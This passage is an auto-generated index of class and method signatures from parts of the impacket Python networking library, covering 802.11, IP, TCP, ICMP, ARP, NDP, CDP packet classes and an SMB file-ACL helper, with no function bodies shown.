class Dot11ControlFrameCFEndDecoder (line 501) | class Dot11ControlFrameCFEndDecoder(BaseDot11Decoder):
method __init__ (line 502) | def __init__(self):
method decode (line 505) | def decode(self, aBuffer):
class Dot11ControlFrameCFEndCFACKDecoder (line 509) | class Dot11ControlFrameCFEndCFACKDecoder(BaseDot11Decoder):
method __init__ (line 510) | def __init__(self):
method decode (line 513) | def decode(self, aBuffer):
class Dot11DataDecoder (line 518) | class Dot11DataDecoder(BaseDot11Decoder):
method __init__ (line 519) | def __init__(self, key_manager):
method set_dot11_hdr (line 522) | def set_dot11_hdr(self, dot11_obj):
method decode (line 525) | def decode(self, aBuffer):
class Dot11WEPDecoder (line 567) | class Dot11WEPDecoder(BaseDot11Decoder):
method __init__ (line 568) | def __init__(self, key_manager):
method set_bssid (line 572) | def set_bssid(self, bssid):
method decode (line 575) | def decode(self, aBuffer):
class Dot11WEPDataDecoder (line 596) | class Dot11WEPDataDecoder(BaseDot11Decoder):
method __init__ (line 597) | def __init__(self):
method decode (line 600) | def decode(self, aBuffer):
class Dot11WPADecoder (line 617) | class Dot11WPADecoder(BaseDot11Decoder):
method __init__ (line 618) | def __init__(self):
method decode (line 621) | def decode(self, aBuffer, key=None):
class Dot11WPADataDecoder (line 641) | class Dot11WPADataDecoder(BaseDot11Decoder):
method __init__ (line 642) | def __init__(self):
method decode (line 645) | def decode(self, aBuffer):
class Dot11WPA2Decoder (line 656) | class Dot11WPA2Decoder(BaseDot11Decoder):
method __init__ (line 657) | def __init__(self):
method decode (line 660) | def decode(self, aBuffer, key=None):
class Dot11WPA2DataDecoder (line 680) | class Dot11WPA2DataDecoder(BaseDot11Decoder):
method __init__ (line 681) | def __init__(self):
method decode (line 684) | def decode(self, aBuffer):
class LLCDecoder (line 695) | class LLCDecoder(Decoder):
method __init__ (line 696) | def __init__(self):
method decode (line 699) | def decode(self, aBuffer):
class SNAPDecoder (line 717) | class SNAPDecoder(Decoder):
method __init__ (line 718) | def __init__(self):
method decode (line 721) | def decode(self, aBuffer):
class CDPDecoder (line 747) | class CDPDecoder(Decoder):
method __init__ (line 749) | def __init__(self):
method decode (line 752) | def decode(self, aBuffer):
class Dot11ManagementDecoder (line 757) | class Dot11ManagementDecoder(BaseDot11Decoder):
method __init__ (line 758) | def __init__(self):
method set_subtype (line 762) | def set_subtype(self, subtype):
method decode (line 765) | def decode(self, aBuffer):
class Dot11ManagementBeaconDecoder (line 806) | class Dot11ManagementBeaconDecoder(BaseDot11Decoder):
method __init__ (line 807) | def __init__(self):
method decode (line 810) | def decode(self, aBuffer):
class Dot11ManagementProbeRequestDecoder (line 816) | class Dot11ManagementProbeRequestDecoder(BaseDot11Decoder):
method __init__ (line 817) | def __init__(self):
method decode (line 820) | def decode(self, aBuffer):
class Dot11ManagementProbeResponseDecoder (line 826) | class Dot11ManagementProbeResponseDecoder(BaseDot11Decoder):
method __init__ (line 827) | def __init__(self):
method decode (line 830) | def decode(self, aBuffer):
class Dot11ManagementDeauthenticationDecoder (line 836) | class Dot11ManagementDeauthenticationDecoder(BaseDot11Decoder):
method __init__ (line 837) | def __init__(self):
method decode (line 840) | def decode(self, aBuffer):
class Dot11ManagementAuthenticationDecoder (line 846) | class Dot11ManagementAuthenticationDecoder(BaseDot11Decoder):
method __init__ (line 847) | def __init__(self):
method decode (line 850) | def decode(self, aBuffer):
class Dot11ManagementDisassociationDecoder (line 856) | class Dot11ManagementDisassociationDecoder(BaseDot11Decoder):
method __init__ (line 857) | def __init__(self):
method decode (line 860) | def decode(self, aBuffer):
class Dot11ManagementAssociationRequestDecoder (line 866) | class Dot11ManagementAssociationRequestDecoder(BaseDot11Decoder):
method __init__ (line 867) | def __init__(self):
method decode (line 870) | def decode(self, aBuffer):
class Dot11ManagementAssociationResponseDecoder (line 876) | class Dot11ManagementAssociationResponseDecoder(BaseDot11Decoder):
method __init__ (line 877) | def __init__(self):
method decode (line 880) | def decode(self, aBuffer):
class Dot11ManagementReassociationRequestDecoder (line 886) | class Dot11ManagementReassociationRequestDecoder(BaseDot11Decoder):
method __init__ (line 887) | def __init__(self):
method decode (line 890) | def decode(self, aBuffer):
class Dot11ManagementReassociationResponseDecoder (line 896) | class Dot11ManagementReassociationResponseDecoder(BaseDot11Decoder):
method __init__ (line 897) | def __init__(self):
method decode (line 900) | def decode(self, aBuffer):
class BaseDecoder (line 906) | class BaseDecoder(Decoder):
method decode (line 908) | def decode(self, buff):
class SimpleConfigDecoder (line 916) | class SimpleConfigDecoder(BaseDecoder):
method decode (line 922) | def decode(self, buff):
class EAPExpandedDecoder (line 932) | class EAPExpandedDecoder(BaseDecoder):
class EAPRDecoder (line 939) | class EAPRDecoder(BaseDecoder):
class EAPDecoder (line 946) | class EAPDecoder(BaseDecoder):
class EAPOLDecoder (line 954) | class EAPOLDecoder(BaseDecoder):
class BootpDecoder (line 961) | class BootpDecoder(Decoder):
method __init__ (line 962) | def __init__(self):
method decode (line 965) | def decode(self, aBuffer):
class DHCPDecoder (line 975) | class DHCPDecoder(Decoder):
method __init__ (line 976) | def __init__(self):
method decode (line 979) | def decode(self, aBuffer):
FILE: impacket/ImpactPacket.py
class ImpactPacketException (line 51) | class ImpactPacketException(Exception):
method __init__ (line 52) | def __init__(self, value):
method __str__ (line 54) | def __str__(self):
class PacketBuffer (line 57) | class PacketBuffer(object):
method __init__ (line 66) | def __init__(self, length = None):
method set_bytes_from_string (line 73) | def set_bytes_from_string(self, data):
method get_buffer_as_string (line 77) | def get_buffer_as_string(self):
method get_bytes (line 81) | def get_bytes(self):
method set_bytes (line 85) | def set_bytes(self, bytes):
method set_byte (line 90) | def set_byte(self, index, value):
method get_byte (line 95) | def get_byte(self, index):
method set_word (line 100) | def set_word(self, index, value, order = '!'):
method get_word (line 109) | def get_word(self, index, order = '!'):
method set_long (line 119) | def set_long(self, index, value, order = '!'):
method get_long (line 128) | def get_long(self, index, order = '!'):
method set_long_long (line 138) | def set_long_long(self, index, value, order = '!'):
method get_long_long (line 147) | def get_long_long(self, index, order = '!'):
method get_ip_address (line 158) | def get_ip_address(self, index):
method set_ip_address (line 167) | def set_ip_address(self, index, ip_string):
method set_checksum_from_data (line 177) | def set_checksum_from_data(self, index, data):
method compute_checksum (line 181) | def compute_checksum(self, anArray):
method normalize_checksum (line 194) | def normalize_checksum(self, aValue):
method __validate_index (line 201) | def __validate_index(self, index, size):
class ProtocolLayer (line 221) | class ProtocolLayer():
method contains (line 227) | def contains(self, aHeader):
method set_parent (line 232) | def set_parent(self, my_parent):
method child (line 236) | def child(self):
method parent (line 240) | def parent(self):
method unlink_child (line 244) | def unlink_child(self):
class ProtocolPacket (line 250) | class ProtocolPacket(ProtocolLayer):
method __init__ (line 259) | def __init__(self, header_size, tail_size):
method __update_body_from_child (line 266) | def __update_body_from_child(self):
method __get_header (line 273) | def __get_header(self):
method __get_body (line 278) | def __get_body(self):
method __get_tail (line 284) | def __get_tail(self):
method get_header_size (line 289) | def get_header_size(self):
method get_tail_size (line 293) | def get_tail_size(self):
method get_body_size (line 297) | def get_body_size(self):
method get_size (line 302) | def get_size(self):
method load_header (line 306) | def load_header(self, aBuffer):
method load_body (line 310) | def load_body(self, aBuffer):
method load_tail (line 317) | def load_tail(self, aBuffer):
method __extract_header (line 321) | def __extract_header(self, aBuffer):
method __extract_body (line 324) | def __extract_body(self, aBuffer):
method __extract_tail (line 332) | def __extract_tail(self, aBuffer):
method load_packet (line 340) | def load_packet(self, aBuffer):
method get_header_as_string (line 349) | def get_header_as_string(self):
method get_body_as_string (line 352) | def get_body_as_string(self):
method get_tail_as_string (line 357) | def get_tail_as_string(self):
method get_packet (line 361) | def get_packet(self):
class Header (line 380) | class Header(PacketBuffer,ProtocolLayer):
method __init__ (line 387) | def __init__(self, length = None):
method get_data_as_string (line 391) | def get_data_as_string(self):
method get_packet (line 399) | def get_packet(self):
method get_size (line 412) | def get_size(self):
method calculate_checksum (line 419) | def calculate_checksum(self):
method get_pseudo_header (line 423) | def get_pseudo_header(self):
method load_header (line 428) | def load_header(self, aBuffer):
method get_header_size (line 438) | def get_header_size(self):
method list_as_hex (line 442) | def list_as_hex(self, aList):
method __str__ (line 471) | def __str__(self):
class Data (line 484) | class Data(Header):
method __init__ (line 498) | def __init__(self, aBuffer = None):
method set_data (line 503) | def set_data(self, data):
method get_size (line 506) | def get_size(self):
class EthernetTag (line 510) | class EthernetTag(PacketBuffer):
method __init__ (line 514) | def __init__(self, value=0x81000000):
method get_tpid (line 518) | def get_tpid(self):
method set_tpid (line 522) | def set_tpid(self, value):
method get_pcp (line 526) | def get_pcp(self):
method set_pcp (line 530) | def set_pcp(self, value):
method get_dei (line 535) | def get_dei(self):
method set_dei (line 539) | def set_dei(self, value):
method get_vid (line 544) | def get_vid(self):
method set_vid (line 548) | def set_vid(self, value):
method __str__ (line 553) | def __str__(self):
class Ethernet (line 572) | class Ethernet(Header):
method __init__ (line 573) | def __init__(self, aBuffer = None):
method set_ether_type (line 579) | def set_ether_type(self, aValue):
method get_ether_type (line 583) | def get_ether_type(self):
method get_tag (line 587) | def get_tag(self, index):
method set_tag (line 594) | def set_tag(self, index, tag):
method push_tag (line 603) | def push_tag(self, tag, index=0):
method pop_tag (line 614) | def pop_tag(self, index=0):
method load_header (line 626) | def load_header(self, aBuffer):
method get_header_size (line 637) | def get_header_size(self):
method get_packet (line 641) | def get_packet(self):
method get_ether_dhost (line 651) | def get_ether_dhost(self):
method set_ether_dhost (line 655) | def set_ether_dhost(self, aValue):
method get_ether_shost (line 660) | def get_ether_shost(self):
method set_ether_shost (line 664) | def set_ether_shost(self, aValue):
method as_eth_addr (line 670) | def as_eth_addr(anArray):
method __str__ (line 674) | def __str__(self):
method __validate_tag_index (line 681) | def __validate_tag_index(self, index):
class LinuxSLL (line 692) | class LinuxSLL(Header):
method __init__ (line 701) | def __init__(self, aBuffer = None):
method set_type (line 706) | def set_type(self, type):
method get_type (line 710) | def get_type(self):
method set_arphdr (line 714) | def set_arphdr(self, value):
method get_arphdr (line 718) | def get_arphdr(self):
method set_addr_len (line 722) | def set_addr_len(self, len):
method get_addr_len (line 726) | def get_addr_len(self):
method set_addr (line 730) | def set_addr(self, addr):
method get_addr (line 737) | def get_addr(self):
method set_ether_type (line 741) | def set_ether_type(self, aValue):
method get_ether_type (line 745) | def get_ether_type(self):
method get_header_size (line 749) | def get_header_size(self):
method get_packet (line 753) | def get_packet(self):
method get_type_desc (line 758) | def get_type_desc(self):
method __str__ (line 765) | def __str__(self):
class IP (line 776) | class IP(Header):
method __init__ (line 778) | def __init__(self, aBuffer = None):
method get_packet (line 795) | def get_packet(self):
method get_pseudo_header (line 846) | def get_pseudo_header(self):
method add_option (line 858) | def add_option(self, option):
method get_ip_v (line 867) | def get_ip_v(self):
method set_ip_v (line 871) | def set_ip_v(self, value):
method get_ip_hl (line 878) | def get_ip_hl(self):
method set_ip_hl (line 882) | def set_ip_hl(self, value):
method get_ip_tos (line 889) | def get_ip_tos(self):
method set_ip_tos (line 892) | def set_ip_tos(self,value):
method get_ip_len (line 895) | def get_ip_len(self):
method set_ip_len (line 901) | def set_ip_len(self, value):
method get_ip_id (line 907) | def get_ip_id(self):
method set_ip_id (line 909) | def set_ip_id(self, value):
method get_ip_off (line 912) | def get_ip_off(self):
method set_ip_off (line 918) | def set_ip_off(self, aValue):
method get_ip_offmask (line 924) | def get_ip_offmask(self):
method set_ip_offmask (line 927) | def set_ip_offmask(self, aValue):
method get_ip_rf (line 932) | def get_ip_rf(self):
method set_ip_rf (line 935) | def set_ip_rf(self, aValue):
method get_ip_df (line 944) | def get_ip_df(self):
method set_ip_df (line 947) | def set_ip_df(self, aValue):
method get_ip_mf (line 956) | def get_ip_mf(self):
method set_ip_mf (line 959) | def set_ip_mf(self, aValue):
method fragment_by_list (line 969) | def fragment_by_list(self, aList):
method fragment_by_size (line 1028) | def fragment_by_size(self, aSize):
method get_ip_ttl (line 1044) | def get_ip_ttl(self):
method set_ip_ttl (line 1046) | def set_ip_ttl(self, value):
method get_ip_p (line 1049) | def get_ip_p(self):
method set_ip_p (line 1052) | def set_ip_p(self, value):
method get_ip_sum (line 1055) | def get_ip_sum(self):
method set_ip_sum (line 1057) | def set_ip_sum(self, value):
method reset_ip_sum (line 1061) | def reset_ip_sum(self):
method get_ip_src (line 1065) | def get_ip_src(self):
method set_ip_src (line 1067) | def set_ip_src(self, value):
method get_ip_dst (line 1070) | def get_ip_dst(self):
method set_ip_dst (line 1073) | def set_ip_dst(self, value):
method get_header_size (line 1076) | def get_header_size(self):
method load_header (line 1085) | def load_header(self, aBuffer):
method __str__ (line 1113) | def __str__(self):
class IPOption (line 1129) | class IPOption(PacketBuffer):
method __init__ (line 1137) | def __init__(self, opcode = 0, size = None):
method append_ip (line 1187) | def append_ip(self, ip):
method set_code (line 1204) | def set_code(self, value):
method get_code (line 1207) | def get_code(self):
method set_flags (line 1211) | def set_flags(self, flags):
method get_flags (line 1216) | def get_flags(self, flags):
method set_len (line 1222) | def set_len(self, len):
method set_ptr (line 1226) | def set_ptr(self, ptr):
method get_ptr (line 1229) | def get_ptr(self):
method get_len (line 1232) | def get_len(self):
method __str__ (line 1236) | def __str__(self):
method print_addresses (line 1258) | def print_addresses(self):
class UDP (line 1277) | class UDP(Header):
method __init__ (line 1279) | def __init__(self, aBuffer = None):
method get_uh_sport (line 1284) | def get_uh_sport(self):
method set_uh_sport (line 1286) | def set_uh_sport(self, value):
method get_uh_dport (line 1289) | def get_uh_dport(self):
method set_uh_dport (line 1291) | def set_uh_dport(self, value):
method get_uh_ulen (line 1294) | def get_uh_ulen(self):
method set_uh_ulen (line 1297) | def set_uh_ulen(self, value):
method get_uh_sum (line 1300) | def get_uh_sum(self):
method set_uh_sum (line 1303) | def set_uh_sum(self, value):
method calculate_checksum (line 1307) | def calculate_checksum(self):
method get_header_size (line 1322) | def get_header_size(self):
method __str__ (line 1325) | def __str__(self):
method get_packet (line 1331) | def get_packet(self):
class TCP (line 1337) | class TCP(Header):
method __init__ (line 1340) | def __init__(self, aBuffer = None):
method add_option (line 1347) | def add_option(self, option):
method get_options (line 1357) | def get_options(self):
method swapSourceAndDestination (line 1360) | def swapSourceAndDestination(self):
method set_th_sport (line 1369) | def set_th_sport(self, aValue):
method get_th_sport (line 1372) | def get_th_sport(self):
method get_th_dport (line 1375) | def get_th_dport(self):
method set_th_dport (line 1378) | def set_th_dport(self, aValue):
method get_th_seq (line 1381) | def get_th_seq(self):
method set_th_seq (line 1384) | def set_th_seq(self, aValue):
method get_th_ack (line 1387) | def get_th_ack(self):
method set_th_ack (line 1390) | def set_th_ack(self, aValue):
method get_th_flags (line 1393) | def get_th_flags(self):
method set_th_flags (line 1396) | def set_th_flags(self, aValue):
method get_th_win (line 1401) | def get_th_win(self):
method set_th_win (line 1404) | def set_th_win(self, aValue):
method set_th_sum (line 1407) | def set_th_sum(self, aValue):
method get_th_sum (line 1411) | def get_th_sum(self):
method get_th_urp (line 1414) | def get_th_urp(self):
method set_th_urp (line 1417) | def set_th_urp(self, aValue):
method get_th_reserved (line 1422) | def get_th_reserved(self):
method get_th_off (line 1427) | def get_th_off(self):
method set_th_off (line 1431) | def set_th_off(self, aValue):
method get_CWR (line 1437) | def get_CWR(self):
method set_CWR (line 1439) | def set_CWR(self):
method reset_CWR (line 1441) | def reset_CWR(self):
method get_ECE (line 1444) | def get_ECE(self):
method set_ECE (line 1446) | def set_ECE(self):
method reset_ECE (line 1448) | def reset_ECE(self):
method get_URG (line 1451) | def get_URG(self):
method set_URG (line 1453) | def set_URG(self):
method reset_URG (line 1455) | def reset_URG(self):
method get_ACK (line 1458) | def get_ACK(self):
method set_ACK (line 1460) | def set_ACK(self):
method reset_ACK (line 1462) | def reset_ACK(self):
method get_PSH (line 1465) | def get_PSH(self):
method set_PSH (line 1467) | def set_PSH(self):
method reset_PSH (line 1469) | def reset_PSH(self):
method get_RST (line 1472) | def get_RST(self):
method set_RST (line 1474) | def set_RST(self):
method reset_RST (line 1476) | def reset_RST(self):
method get_SYN (line 1479) | def get_SYN(self):
method set_SYN (line 1481) | def set_SYN(self):
method reset_SYN (line 1483) | def reset_SYN(self):
method get_FIN (line 1486) | def get_FIN(self):
method set_FIN (line 1488) | def set_FIN(self):
method reset_FIN (line 1490) | def reset_FIN(self):
method get_header_size (line 1495) | def get_header_size(self):
method calculate_checksum (line 1498) | def calculate_checksum(self):
method get_packet (line 1515) | def get_packet(self):
method load_header (line 1532) | def load_header(self, aBuffer):
method get_flag (line 1564) | def get_flag(self, bit):
method reset_flags (line 1570) | def reset_flags(self, aValue):
method set_flags (line 1574) | def set_flags(self, aValue):
method get_padded_options (line 1578) | def get_padded_options(self):
method __str__ (line 1588) | def __str__(self):
class TCPOption (line 1615) | class TCPOption(PacketBuffer):
method __init__ (line 1626) | def __init__(self, kind, data = None):
method set_left_edge (line 1667) | def set_left_edge(self, aValue):
method set_right_edge (line 1670) | def set_right_edge(self, aValue):
method set_kind (line 1673) | def set_kind(self, kind):
method get_kind (line 1677) | def get_kind(self):
method set_len (line 1681) | def set_len(self, len):
method get_len (line 1686) | def get_len(self):
method get_size (line 1691) | def get_size(self):
method set_mss (line 1695) | def set_mss(self, len):
method get_mss (line 1700) | def get_mss(self):
method set_shift_cnt (line 1705) | def set_shift_cnt(self, cnt):
method get_shift_cnt (line 1710) | def get_shift_cnt(self):
method get_ts (line 1715) | def get_ts(self):
method set_ts (line 1720) | def set_ts(self, ts):
method get_ts_echo (line 1725) | def get_ts_echo(self):
method set_ts_echo (line 1730) | def set_ts_echo(self, ts):
method __str__ (line 1735) | def __str__(self):
class ICMP (line 1756) | class ICMP(Header):
method __init__ (line 1800) | def __init__(self, aBuffer = None):
method get_header_size (line 1805) | def get_header_size(self):
method get_icmp_type (line 1812) | def get_icmp_type(self):
method set_icmp_type (line 1815) | def set_icmp_type(self, aValue):
method get_icmp_code (line 1818) | def get_icmp_code(self):
method set_icmp_code (line 1821) | def set_icmp_code(self, aValue):
method get_icmp_cksum (line 1824) | def get_icmp_cksum(self):
method set_icmp_cksum (line 1827) | def set_icmp_cksum(self, aValue):
method get_icmp_gwaddr (line 1831) | def get_icmp_gwaddr(self):
method set_icmp_gwaddr (line 1834) | def set_icmp_gwaddr(self, ip):
method get_icmp_id (line 1837) | def get_icmp_id(self):
method set_icmp_id (line 1840) | def set_icmp_id(self, aValue):
method get_icmp_seq (line 1843) | def get_icmp_seq(self):
method set_icmp_seq (line 1846) | def set_icmp_seq(self, aValue):
method get_icmp_void (line 1849) | def get_icmp_void(self):
method set_icmp_void (line 1852) | def set_icmp_void(self, aValue):
method get_icmp_nextmtu (line 1856) | def get_icmp_nextmtu(self):
method set_icmp_nextmtu (line 1859) | def set_icmp_nextmtu(self, aValue):
method get_icmp_num_addrs (line 1862) | def get_icmp_num_addrs(self):
method set_icmp_num_addrs (line 1865) | def set_icmp_num_addrs(self, aValue):
method get_icmp_wpa (line 1868) | def get_icmp_wpa(self):
method set_icmp_wpa (line 1871) | def set_icmp_wpa(self, aValue):
method get_icmp_lifetime (line 1874) | def get_icmp_lifetime(self):
method set_icmp_lifetime (line 1877) | def set_icmp_lifetime(self, aValue):
method get_icmp_otime (line 1880) | def get_icmp_otime(self):
method set_icmp_otime (line 1883) | def set_icmp_otime(self, aValue):
method get_icmp_rtime (line 1886) | def get_icmp_rtime(self):
method set_icmp_rtime (line 1889) | def set_icmp_rtime(self, aValue):
method get_icmp_ttime (line 1892) | def get_icmp_ttime(self):
method set_icmp_ttime (line 1895) | def set_icmp_ttime(self, aValue):
method get_icmp_mask (line 1898) | def get_icmp_mask(self):
method set_icmp_mask (line 1901) | def set_icmp_mask(self, mask):
method calculate_checksum (line 1905) | def calculate_checksum(self):
method get_type_name (line 1915) | def get_type_name(self, aType):
method get_code_name (line 1920) | def get_code_name(self, aType, aCode):
method __str__ (line 1936) | def __str__(self):
method isDestinationUnreachable (line 1945) | def isDestinationUnreachable(self):
method isError (line 1948) | def isError(self):
method isHostUnreachable (line 1951) | def isHostUnreachable(self):
method isNetUnreachable (line 1954) | def isNetUnreachable(self):
method isPortUnreachable (line 1957) | def isPortUnreachable(self):
method isProtocolUnreachable (line 1960) | def isProtocolUnreachable(self):
method isQuery (line 1963) | def isQuery(self):
class IGMP (line 1967) | class IGMP(Header):
method __init__ (line 1969) | def __init__(self, aBuffer = None):
method get_igmp_type (line 1974) | def get_igmp_type(self):
method set_igmp_type (line 1977) | def set_igmp_type(self, aValue):
method get_igmp_code (line 1980) | def get_igmp_code(self):
method set_igmp_code (line 1983) | def set_igmp_code(self, aValue):
method get_igmp_cksum (line 1986) | def get_igmp_cksum(self):
method set_igmp_cksum (line 1989) | def set_igmp_cksum(self, aValue):
method get_igmp_group (line 1992) | def get_igmp_group(self):
method set_igmp_group (line 1995) | def set_igmp_group(self, aValue):
method get_header_size (line 1998) | def get_header_size(self):
method get_type_name (line 2001) | def get_type_name(self, aType):
method calculate_checksum (line 2006) | def calculate_checksum(self):
method __str__ (line 2010) | def __str__(self):
class ARP (line 2019) | class ARP(Header):
method __init__ (line 2021) | def __init__(self, aBuffer = None):
method get_ar_hrd (line 2026) | def get_ar_hrd(self):
method set_ar_hrd (line 2029) | def set_ar_hrd(self, aValue):
method get_ar_pro (line 2032) | def get_ar_pro(self):
method set_ar_pro (line 2035) | def set_ar_pro(self, aValue):
method get_ar_hln (line 2038) | def get_ar_hln(self):
method set_ar_hln (line 2041) | def set_ar_hln(self, aValue):
method get_ar_pln (line 2044) | def get_ar_pln(self):
method set_ar_pln (line 2047) | def set_ar_pln(self, aValue):
method get_ar_op (line 2050) | def get_ar_op(self):
method set_ar_op (line 2053) | def set_ar_op(self, aValue):
method get_ar_sha (line 2056) | def get_ar_sha(self):
method set_ar_sha (line 2060) | def set_ar_sha(self, aValue):
method get_ar_spa (line 2064) | def get_ar_spa(self):
method set_ar_spa (line 2068) | def set_ar_spa(self, aValue):
method get_ar_tha (line 2072) | def get_ar_tha(self):
method set_ar_tha (line 2077) | def set_ar_tha(self, aValue):
method get_ar_tpa (line 2082) | def get_ar_tpa(self):
method set_ar_tpa (line 2087) | def set_ar_tpa(self, aValue):
method get_header_size (line 2092) | def get_header_size(self):
method get_op_name (line 2095) | def get_op_name(self, ar_op):
method get_hrd_name (line 2100) | def get_hrd_name(self, ar_hrd):
method as_hrd (line 2106) | def as_hrd(self, anArray):
method as_pro (line 2114) | def as_pro(self, anArray):
method __str__ (line 2122) | def __str__(self):
function example (line 2134) | def example(): #To execute an example, remove this line
FILE: impacket/NDP.py
class NDP (line 19) | class NDP(ICMP6):
method append_ndp_option (line 30) | def append_ndp_option(self, ndp_option):
method Router_Solicitation (line 38) | def Router_Solicitation(class_object):
method Router_Advertisement (line 43) | def Router_Advertisement(class_object, current_hop_limit,
method Neighbor_Solicitation (line 56) | def Neighbor_Solicitation(class_object, target_address):
method Neighbor_Advertisement (line 63) | def Neighbor_Advertisement(class_object, router_flag, solicited_flag, ...
method Redirect (line 78) | def Redirect(class_object, target_address, destination_address):
method __build_message (line 86) | def __build_message(class_object, type, message_data):
class NDP_Option (line 102) | class NDP_Option():
method Source_Link_Layer_Address (line 113) | def Source_Link_Layer_Address(class_object, link_layer_address):
method Target_Link_Layer_Address (line 118) | def Target_Link_Layer_Address(class_object, link_layer_address):
method __Link_Layer_Address (line 123) | def __Link_Layer_Address(class_object, option_type, link_layer_address):
method Prefix_Information (line 131) | def Prefix_Information(class_object, prefix_length, on_link_flag, auto...
method Redirected_Header (line 147) | def Redirected_Header(class_object, original_packet):
method MTU (line 154) | def MTU(class_object, mtu):
method __build_option (line 162) | def __build_option(class_object, type, length, option_data):
FILE: impacket/__init__.py
class NullHandler (line 20) | class NullHandler(logging.Handler):
method emit (line 21) | def emit(self, record):
FILE: impacket/acl.py
class FileNTUser (line 57) | class FileNTUser( Structure ):
class ACL_SID (line 67) | class ACL_SID( Structure ):
method __repr__ (line 75) | def __repr__(self):
method build_from_string (line 88) | def build_from_string(data):
method __str__ (line 102) | def __str__(self):
method __eq__ (line 105) | def __eq__(self, other):
method __hash__ (line 108) | def __hash__(self):
method split (line 111) | def split(self, *args, **kwargs):
class FileNTACE (line 116) | class FileNTACE( Structure ):
method __str__ (line 128) | def __str__(self):
method get_readable_ntace_flags (line 140) | def get_readable_ntace_flags(self):
method get_readable_standard_rights (line 166) | def get_readable_standard_rights(self):
method get_readable_specific_rights (line 184) | def get_readable_specific_rights(self):
class SecurityAttributes (line 207) | class SecurityAttributes:
method __init__ (line 212) | def __init__(self, owner, group):
method __repr__ (line 218) | def __repr__(self):
method __str__ (line 226) | def __str__(self):
method __eq__ (line 229) | def __eq__(self, other):
class SMBFileACL (line 233) | class SMBFileACL:
method __init__ (line 239) | def __init__(self, ip=None, remote_name=None, username='', password=''...
method close_connection (line 279) | def close_connection(self):
method close_file (line 295) | def close_file(self):
method open_file (line 304) | def open_file(self, share_name, file_name, desired_access=READ_CONTROL):
method start_dce_rpc (line 317) | def start_dce_rpc(self):
method open_policy_handle (line 332) | def open_policy_handle(self):
method set_sid_to_name (line 344) | def set_sid_to_name(self, sids, resp):
method sids_to_names (line 362) | def sids_to_names(self, sids):
method name_to_sid (line 375) | def name_to_sid(self, name):
method permissions_to_ace (line 385) | def permissions_to_ace(self, username, permissions, action='grant'):
method get_security_attributes (line 422) | def get_security_attributes(self, sec):
method get_permissions (line 470) | def get_permissions(self, share_name, file_name):
method insert_permission (line 499) | def insert_permission(sec, permission):
method set_permissions (line 575) | def set_permissions(self, share_name, file_name, user, permissions, ac...
FILE: impacket/cdp.py
class CDPTypes (line 26) | class CDPTypes:
class CDP (line 41) | class CDP(Header):
method __init__ (line 46) | def __init__(self, aBuffer = None):
method _getElements (line 52) | def _getElements(self, aBuffer):
method get_header_size (line 62) | def get_header_size(self):
method get_version (line 65) | def get_version(self):
method get_ttl (line 68) | def get_ttl(self):
method get_checksum (line 71) | def get_checksum(self):
method get_type (line 74) | def get_type(self):
method get_lenght (line 77) | def get_lenght(self):
method getElements (line 80) | def getElements(self):
method __str__ (line 84) | def __str__(self):
function get_byte (line 91) | def get_byte(buffer, offset):
function get_word (line 94) | def get_word(buffer, offset):
function get_long (line 97) | def get_long(buffer, offset):
function get_bytes (line 100) | def get_bytes(buffer, offset, bytes):
function mac_to_string (line 103) | def mac_to_string(mac_bytes):
class CDPElement (line 112) | class CDPElement(Header):
method __init__ (line 114) | def __init__(self, aBuffer = None):
method Get_length (line 121) | def Get_length(cls, aBuffer):
method get_header_size (line 124) | def get_header_size(self):
method get_length (line 127) | def get_length(self):
method get_data (line 130) | def get_data(self):
method get_ip_address (line 133) | def get_ip_address(self, offset = 0, ip = None):
class CDPDevice (line 138) | class CDPDevice(CDPElement):
method get_type (line 141) | def get_type(self):
method get_device_id (line 144) | def get_device_id(self):
method __str__ (line 147) | def __str__(self):
class Address (line 150) | class Address(CDPElement):
method __init__ (line 153) | def __init__(self, aBuffer = None):
method _generateAddressDetails (line 159) | def _generateAddressDetails(self, buff):
method get_type (line 166) | def get_type(self):
method get_number (line 169) | def get_number(self):
method get_address_details (line 172) | def get_address_details(self):
method __str__ (line 175) | def __str__(self):
class AddressDetails (line 181) | class AddressDetails():
method create (line 186) | def create(cls, buff):
method __init__ (line 191) | def __init__(self, aBuffer = None):
method get_total_length (line 197) | def get_total_length(self):
method get_protocol_type (line 200) | def get_protocol_type(self):
method get_protocol_length (line 203) | def get_protocol_length(self):
method get_protocol (line 206) | def get_protocol(self):
method get_address_length (line 209) | def get_address_length(self):
method get_address (line 212) | def get_address(self):
method is_protocol_IP (line 220) | def is_protocol_IP(self):
method __str__ (line 223) | def __str__(self):
class Port (line 226) | class Port(CDPElement):
method get_type (line 229) | def get_type(self):
method get_port (line 232) | def get_port(self):
method __str__ (line 235) | def __str__(self):
class Capabilities (line 239) | class Capabilities(CDPElement):
method __init__ (line 242) | def __init__(self, aBuffer = None):
method get_type (line 255) | def get_type(self):
method get_capabilities (line 258) | def get_capabilities(self):
method _init_capabilities (line 261) | def _init_capabilities(self):
method is_router (line 274) | def is_router(self):
method is_transparent_bridge (line 277) | def is_transparent_bridge(self):
method is_source_route_bridge (line 280) | def is_source_route_bridge(self):
method is_switch (line 283) | def is_switch(self):
method is_host (line 286) | def is_host(self):
method is_igmp_capable (line 289) | def is_igmp_capable(self):
method is_repeater (line 292) | def is_repeater(self):
method __str__ (line 296) | def __str__(self):
class SoftVersion (line 300) | class SoftVersion(CDPElement):
method get_type (line 303) | def get_type(self):
method get_version (line 306) | def get_version(self):
method __str__ (line 309) | def __str__(self):
class Platform (line 313) | class Platform(CDPElement):
method get_type (line 316) | def get_type(self):
method get_platform (line 319) | def get_platform(self):
method __str__ (line 322) | def __str__(self):
class IpPrefix (line 326) | class IpPrefix(CDPElement):
method get_type (line 329) | def get_type(self):
method get_ip_prefix (line 332) | def get_ip_prefix(self):
method get_bits (line 335) | def get_bits(self):
method __str__ (line 338) | def __str__(self):
class ProtocolHello (line 341) | class ProtocolHello(CDPElement):
method get_type (line 344) | def get_type(self):
method get_master_ip (line 347) | def get_master_ip(self):
method get_version (line 350) | def get_version(self):
method get_sub_version (line 353) | def get_sub_version(self):
method get_status (line 356) | def get_status(self):
method get_cluster_command_mac (line 359) | def get_cluster_command_mac(self):
method get_switch_mac (line 362) | def get_switch_mac(self):
method get_management_vlan (line 365) | def get_management_vlan(self):
method __str__ (line 368) | def __str__(self):
class VTPManagementDomain (line 372) | class VTPManagementDomain(CDPElement):
method get_type (line 375) | def get_type(self):
method get_domain (line 378) | def get_domain(self):
class Duplex (line 382) | class Duplex(CDPElement):
method get_type (line 385) | def get_type(self):
method get_duplex (line 388) | def get_duplex(self):
